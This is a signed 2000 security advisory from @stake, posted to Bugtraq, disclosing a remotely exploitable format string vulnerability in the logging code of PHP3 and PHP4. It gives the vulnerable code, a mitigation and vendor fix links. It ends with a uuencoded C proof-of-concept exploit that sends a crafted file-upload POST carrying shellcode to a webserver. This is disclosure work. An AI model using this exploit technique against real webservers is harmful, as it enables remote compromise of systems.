Date: Thu, 12 Oct 2000 10:04:32 -0400 From: "@stake Advisories" <advisories@ATSTAKE.COM> Subject: @stake Advisory: PHP3/PHP4 Logging Format String Vulnerability (A To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We contacted the PHP team on 10/3/2000 concerning this problem. We wanted to hold off releasing our advisory until a fix was available for PHP3 since some users may not be able to easily upgrade to PHP4. Fixes for PHP3 and PHP4 are now available. We are aware that Jouko Pynnönen <jouko@solutions.fi> found this problem independantly but chose to release before the PHP3 fix was available. Weld Pond @stake, Inc. www.atstake.com Security Advisory Advisory Name: PHP3/PHP4 Logging Format String Vulnerability Release Date: 10/12/2000 Application: PHP3 and PHP4 Platform: All platforms Severity: Attacker can remotely compromise PHP3 enabled webservers, and most likely PHP4 enabled webservers Author: DilDog [dildog@atstake.com] Vendor Status: Fix for PHP3 and PHP4 available Web: www.atstake.com/research/advisories/2000/a101200-1.txt Executive Summary PHP versions 3 and 4 are vulnerabled to format string attacks in their logging functions. This can lead to remote takeover of PHP enabled webservers that have logging enabled. Overview PHP versions 3 and 4 employ a set of logging functions that, through an improper use of 'syslog()' and 'vsnprintf()', render it vulnerable to attack. The attacker could utilize this vulnerability to remotely compromise any PHP enabled webserver that has logging to either syslog or to a file enabled in the 'php.ini' configuration file. This particular attack does not affect PHP installations that do not log PHP errors and warnings. Detailed Description PHP versions 3 and 4 utilize the following functions: main/php_syslog.h: #define php_syslog syslog main/main.c: void php_log_err(char *log_message) { ... php_syslog(LOG_NOTICE, log_message) ... fprintf(log_file, "[%s] ", error_time_str); fprintf(log_file, log_message); fprintf(log_file, "\n"); ... } Hence, if the "log_message" contains any user input at all, then it creates a vulnerability. An exploitable condition is presented in the following code for PHP 3, since 'php3_error' calls down to php_log_err if logging is enabled: main/main.c: PHPAPI void php3_error(int type, const char *format,...) { ... char log_buffer[1024]; snprintf(log_buffer, 1024, "PHP 3 %s: %s in %s on line %d", error_type_str, buffer, filename, php3_get_lineno(GLOBAL(current_lineno))); php3_log_err(log_buffer); ... } functions/post.c: static char *php3_getpost(pval *http_post_vars) { ... php3_error(E_WARNING, "File Upload Error: No MIME boundary found"); php3_error(E_WARNING, "There should have been a \"boundary=3Dsomething\" in the Content-Type string"); php3_error(E_WARNING, "The Content-Type string was: \"%s\"", ctype); ... } PHP4 looks vulnerable as well, but in a different place. When a file is uploaded via a post operation, if the file name contains format string exploit code, and the file size is larger than the maximum file size for uploads, the following code is executed. Note that this possible problem has not been tested by @stake, but the code path looks problematic: static void php_mime_split(char *buf, int cnt, char *boundary, zval *array_ptr) { ... php_error(E_WARNING, "Max file size exceeded - file [%s] not saved", namebuf); ... } Temporary Solution Turn off logging on PHP3 and PHP4 by going into your 'php.ini' file and changing the following settings to: log_errors = Off Vendor Response A fixed version of PHP4 is available: http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz A fixed version of PHP3 is available: http://www.php.net/distributions/php-3.0.17.tar.gz Proof-of-Concept Code This proof of concept code creates a zero length file in /tmp/BADPHP. Use like this: gcc badphp.c && ./a.out <ip address of webserver> <port of webserver> <php file path> (php file path must point to an existing php file, such as /foo.php3) begin 644 badphp.c M(VEN8VQU9&4\<W1D:6\N:#X*(VEN8VQU9&4\<WES+W1Y<&5S+F@^"B-I;F-L M=61E/'-Y<R]S;V-K970N:#X*(VEN8VQU9&4\;F5T:6YE="]I;BYH/@HC:6YC M;'5D93QA<G!A+VEN970N:#X*(VEN8VQU9&4\;F5T9&(N:#X*"B-D969I;F4@ M0E-)6D4@,34T.0HC9&5F:6YE($)51D9%4EI/3D4@,3(X"@II;G0@;6%I;BAI M;G0@87)G8RP@8VAA<B`J87)G=EM=*0I["B`@:6YT(&DL<W1A<G0L8V]U;G0[ M"B`@:6YT('-T86-K;&]C/3!X0D9&1D1!-C`["B`@:6YT(',["B`@1DE,12`J M9CL*("!F9%]S970@<F9D<SL*("!S=')U8W0@:&]S=&5N="`J:&4["B`@<W1R M=6-T('-O8VMA9&1R7VEN('-A9&1R.PH@(&-H87(@<W!L;VET6T)325I%73L* M("!C:&%R(&9I;&5;73TB+W1M<"]"04102%`B.PH@(&-H87(@8SL*"B`@:68H M87)G8R$]-2D@>PH@("`@<')I;G1F*"(E<R`\861D<CX@/'!O<G0^(#QO9F9S M970^(#QP:'`@9FEL92!N86UE/EQN(BQA<F=V6S!=*3L*("`@('!R:6YT9B@B M;V9F<V5T/3`@9F]R(&UO<W0@<WES=&5M<RY<;B(I.R`*("`@(')E='5R;B`P M.PH@('T*"B`@+RHJ*B!B=6EL9"!E>'!L;VET('-T<FEN9R`J*BHO"B`@"B`@ M+RH@=W)I=&4@8F%D(&9O<FUA="!S=')I;F<L(&%D9&EN9R!I;B!O9F9S970@ M*B\*("!S;G!R:6YT9BAS<&QO:70L<VEZ96]F*'-P;&]I="DL"@D@("`B0V]N M=&5N="U4>7!E.FUU;'1I<&%R="]F;W)M+61A=&$@)24E=5@E)5@E)5@E)6AN M(BP*"2`@(#4U.#$W("\J*V]F9G-E=#`L,2PR+#,J+R`I.PH*("`O*B!F:6QL M('=I=&@@8G)E86MP;VEN=',@86YD(&YO<',J+PH@('-T87)T/7-T<FQE;BAS M<&QO:70I.PH@(&UE;7-E="AS<&QO:70K<W1A<G0L,'A#0RQ"4TE:12US=&%R M="D["B`@;65M<V5T*'-P;&]I="MS=&%R="M"549&15):3TY%*C0L,'@Y,"Q" M549&15):3TY%*C0I.PH@('-P;&]I=%M"4TE:12TQ73TP.PH@(`H@("\J('!O M:6YT97(@=&\@<W1A<G0@;V8@8V]D92`H<W1A8VML;V,K-"D@*B\*("!C;W5N M=#U"549&15):3TY%.PH@(&9O<BAI/3`[:3QC;W5N=#MI*RLI('L*("`@('5N M<VEG;F5D(&EN="!V86QU93US=&%C:VQO8RLT*RAC;W5N="HT*3L*("`@(&EF M*"AV86QU928P>#`P,#`P,$9&*3T],"D@=F%L=65\/3!X,#`P,#`P,#0["B`@ M("!I9B@H=F%L=64F,'@P,#`P1D8P,"D]/3`I('9A;'5E?#TP>#`P,#`P-#`P M.PH@("`@:68H*'9A;'5E)C!X,#!&1C`P,#`I/3TP*2!V86QU97P],'@P,#`T M,#`P,#L*("`@(&EF*"AV86QU928P>$9&,#`P,#`P*3T],"D@=F%L=65\/3!X M,#0P,#`P,#`["B`@("`J*'5N<VEG;F5D(&EN="`J*28H<W!L;VET6W-T87)T M*VDJ-%TI/79A;'5E.PH@('T*("!S=&%R="L]0E5&1D526D].12HT*C(["@H@ M("\J*BH@8G5I;&0@<VAE;&QC;V1E("HJ*B\*"B`@<W!L;VET6W-T87)T*S!= M/3!X.3`[("\J(&YO<"`J+PH@(`H@('-P;&]I=%MS=&%R="LQ73TP>$)!.R`O M*B!M;W8@961X+"`H;F]T(#!X,4(V("AA*W)W*2D@*B\*("!S<&QO:71;<W1A M<G0K,ET],'@T.3L*("!S<&QO:71;<W1A<G0K,UT],'A&13L*("!S<&QO:71; M<W1A<G0K-%T],'A&1CL*("!S<&QO:71;<W1A<G0K-5T],'A&1CL*"B`@<W!L M;VET6W-T87)T*S9=/3!X1C<[("\J(&YO="!E9'@@*B\*("!S<&QO:71;<W1A M<G0K-UT],'A$,CL*"B`@<W!L;VET6W-T87)T*SA=/3!X0CD[("\J(&UO=B!E M8W@L("AN;W0@,'@T,"`H3U]#4D5!5"DI("HO"B`@<W!L;VET6W-T87)T*SE= M/3!X0D8["B`@<W!L;VET6W-T87)T*S$P73TP>$9&.PH@('-P;&]I=%MS=&%R M="LQ,5T],'A&1CL*("!S<&QO:71;<W1A<G0K,3)=/3!X1D8["B`@"B`@<W!L M;VET6W-T87)T*S$S73TP>$8W.R`O*B!N;W0@96-X("HO"B`@<W!L;VET6W-T M87)T*S$T73TP>$0Q.PH@(`H@('-P;&]I=%MS=&%R="LQ-5T],'A%.#L@+RH@ M8V%L;"!E:7`K-"`K(&EN8R!E87@@*&]V97)L87!P:6YG*2`J+PH@('-P;&]I M=%MS=&%R="LQ-ET],'A&1CL@"B`@<W!L;VET6W-T87)T*S$W73TP>$9&.R`* M("!S<&QO:71;<W1A<G0K,3A=/3!X1D8[(`H@('-P;&]I=%MS=&%R="LQ.5T] M,'A&1CL@"B`@<W!L;VET6W-T87)T*S(P73TP>$,P.PH@('-P;&]I=%MS=&%R M="LR,5T],'@U0CL@+RH@<&]P(&5B>"`J+PH@('-P;&]I=%MS=&%R="LR,ET] M,'@V03L@+RH@<'5S:"`R,B`H;V9F<V5T('1O(&5N9"!O9B!S<&QO:70@*&9I M;&5N86UE*2D@*B\*("!S<&QO:71;<W1A<G0K,C-=/3!X,38["B`@<W!L;VET M6W-T87)T*S(T73TP>#4X.R`O*B!P;W`@96%X("HO"B`@<W!L;VET6W-T87)T M*S(U73TP>#`S.R`O*B!A9&0@96)X+&5A>"`J+PH@('-P;&]I=%MS=&%R="LR M-ET],'A$.#L*("`*("!S<&QO:71;<W1A<G0K,C==/3!X,S,[("\J('AO<B!E M87@L96%X("HO"B`@<W!L;VET6W-T87)T*S(X73TP>$,P.PH*("!S<&QO:71; M<W1A<G0K,CE=/3!X.#@[("\J(&UO=B!B>71E('!T<B!;96)X*S$Q72QA;"`J M+PH@('-P;&]I=%MS=&%R="LS,%T],'@T,SL*("!S<&QO:71;<W1A<G0K,S%= M/3!X,$(["B`*("!S<&QO:71;<W1A<G0K,S)=/3!X.#,[("\J(&%D9"!E87@L M-2`J+PH@('-P;&]I=%MS=&%R="LS,UT],'A#,#L*("!S<&QO:71;<W1A<G0K M,S1=/3!X,#4["@H@('-P;&]I=%MS=&%R="LS-5T],'A#1#L@+RH@:6YT(#@P M("AO<&5N*2`J+PH@('-P;&]I=%MS=&%R="LS-ET],'@X,#L*"B`@<W!L;VET M6W-T87)T*S,W73TP>#,S.R`O*B!X;W(@96%X+&5A>"`J+PH@('-P;&]I=%MS M=&%R="LS.%T],'A#,#L*(`H@('-P;&]I=%MS=&%R="LS.5T],'@T,#L@+RH@ M:6YC(&5A>"`J+PH@(`H@('-P;&]I=%MS=&%R="LT,%T],'A#1#L@+RH@:6YT M(#@P("A?97AI="D@*B\*("!S<&QO:71;<W1A<G0K-#%=/3!X.#`["B`@"B`@ M+RH@861D(&9I;&5N86UE('1O('1O=6-H("HO"B`@<W1R;F-P>2@F<W!L;VET M6W-T87)T*S0R72QF:6QE+'-T<FQE;BAF:6QE*2D["@H@("\J*BH@<V5N9"!E M>'!L;VET('-T<FEN9R`J*BHO"B`*("`O*B!C<F5A=&4@<V]C:V5T("HO"B`@ M<SUS;V-K970H4$9?24Y%5"Q33T-+7U-44D5!32Q)4%!23U1/7U1#4"D["B`@ M:68H<SPP*2!["B`@("!P<FEN=&8H(F-O=6QD;B=T(&-R96%T92!S;V-K970N M7&XB*3L*("`@(')E='5R;B`P.PH@('T@"B`*("`O*B!C;VYN96-T('1O('!O M<G0@*B\*("!M96US970H)G-A9&1R+#`L<VEZ96]F*'-A9&1R*2D["B`@<V%D M9'(N<VEN7V9A;6EL>3U!1E])3D54.PH@('-A9&1R+G-I;E]P;W)T/6AT;VYS M*&%T;VDH87)G=ELR72DI.PH@(&AE/6=E=&AO<W1B>6YA;64H87)G=ELQ72D[ M"B`@:68H:&4]/4Y53$PI('L*("`@('!R:6YT9B@B:6YV86QI9"!H;W-T;F%M M92Y<;B(I.PH@('T*("!M96UC<'DH)BAS861D<BYS:6Y?861D<BYS7V%D9'(I M+&AE+3YH7V%D9')?;&ES=%LP72QS:7IE;V8H<W1R=6-T(&EN7V%D9'(I*3L* M"B`@:68H8V]N;F5C="AS+"AS=')U8W0@<V]C:V%D9'(@*BDF<V%D9'(L<VEZ M96]F*'-A9&1R*2DA/3`I('L*("`@('!R:6YT9B@B8V]U;&1N)W0@8V]N;F5C M="Y<;B(I.PH@("`@<F5T=7)N(#`["B`@?0H@(`H@("\J(&9D;W!E;B!T:&4@ M<V]C:V5T('1O('5S92!S=')E86T@9G5N8W1I;VYS("HO"B`@9CUF9&]P96XH M<RPB=R(I.PH@(&EF*&8]/4Y53$PI('L*("`@(&-L;W-E*',I.PH@("`@<')I M;G1F*")C;W5L9&XG="!F9&]P96X@<V]C:V5T+EQN(BD["B`@("!R971U<FX@ M,#L*("!]"@H@("\J('!U="!T:&4@<&]S="!R97%U97-T('1O('1H92!S;V-K M970@*B\*("!F<')I;G1F*&8L(E!/4U0@)7,@2%144"\Q+C!<;B(L87)G=ELT M72D["B`@9G!U=',H<W!L;VET+&8I.PH@(&9P=71C*"=<;B<L9BD["B`@9G!U M=&,H)UQN)RQF*3L*("!F9FQU<V@H9BD["@H@("\J(&-L;W-E('1H92!S;V-K M970@*B\*("!F8VQO<V4H9BD["B`@8VQO<V4H<RD["@H@(')E='5R;B`P.PI] ("@H*"@H*"@H` ` end For more advisories: http://www.atstake.com/research/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOeXDs1ESXwDtLdMhEQKhfQCg9vH3t5G8VsJfm87jcfFd1+wUwSUAoPK0 Nuo1xrPafrB4/ktOyIvMJzzf =URKs -----END PGP SIGNATURE-----